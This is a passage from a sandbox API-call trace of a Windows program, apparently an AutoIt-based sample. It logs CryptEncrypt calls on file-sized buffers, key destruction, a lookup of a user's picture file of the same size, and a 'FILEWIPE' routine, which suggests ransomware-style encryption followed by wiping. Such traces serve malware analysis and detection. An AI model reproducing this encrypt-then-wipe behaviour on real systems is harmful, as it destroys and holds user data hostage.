wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.032] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0040.032] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.033] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.033] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0xfbf7, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0xfc00) returned 1 [0040.033] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.033] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0040.033] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.033] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.033] CharLowerBuffW (in: lpsz="byte[64513]", cchLength=0xb | out: lpsz="byte[64513]") returned 0xb [0040.033] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.034] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.034] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.034] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.034] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.034] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x944c08*, pdwDataLen=0x6ae220*=0xfbf7, dwBufLen=0xfc00 | out: pbData=0x944c08*, pdwDataLen=0x6ae220*=0xfc00) returned 1 [0040.035] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.035] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0040.035] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.035] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.035] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.035] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.035] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0040.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0040.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.035] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.035] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0040.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.035] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.036] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0040.036] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.036] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.036] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0040.036] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.036] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0040.036] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.040] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.040] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.040] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.044] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.044] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.044] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0040.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.044] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.044] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.044] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0040.044] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.044] CryptDestroyKey (hKey=0x7c2200) returned 1 [0040.044] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.044] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.044] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0040.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0040.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.044] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0040.044] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0040.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.045] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0040.045] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0040.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0040.045] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0040.045] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.045] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0040.045] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0040.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0040.045] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0040.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0040.045] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.045] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.045] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.045] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0040.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0040.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.045] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.045] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0040.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.045] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.045] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0040.046] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.046] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0040.046] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0040.046] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.046] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0040.046] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0040.046] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0040.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0040.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0040.046] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0040.046] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.046] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0040.046] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.046] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.046] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0040.046] FreeLibrary (hLibModule=0x754b0000) returned 1 [0040.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0040.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0040.046] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0040.047] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0040.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0040.047] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.047] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.047] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.048] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.048] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0040.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0040.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.048] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.048] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.048] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadd4fc30, ftCreationTime.dwHighDateTime=0x1d5bef1, ftLastAccessTime.dwLowDateTime=0x2ece4750, ftLastAccessTime.dwHighDateTime=0x1d5bbab, ftLastWriteTime.dwLowDateTime=0x2ece4750, ftLastWriteTime.dwHighDateTime=0x1d5bbab, nFileSizeHigh=0x0, nFileSizeLow=0xfbf7, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Uruf9aJfh14ZE.gif", cAlternateFileName="URUF9A~1.GIF")) returned 0x7c2100 [0040.048] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0040.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0040.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0040.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0040.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.048] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.048] CharLowerBuffW (in: lpsz="byte[64503]", cchLength=0xb | out: lpsz="byte[64503]") returned 0xb [0040.048] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.049] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0040.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0040.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.049] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.049] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0040.049] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0040.049] FreeLibrary (hLibModule=0x76b40000) returned 1 [0040.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0040.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0040.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0040.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0040.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0040.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0040.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0040.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0040.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0040.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0040.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0040.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0040.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0040.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0040.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0040.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0040.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0040.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0040.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0040.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0040.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0040.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0040.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0040.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0040.050] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.050] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.050] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.050] CharUpperBuffW 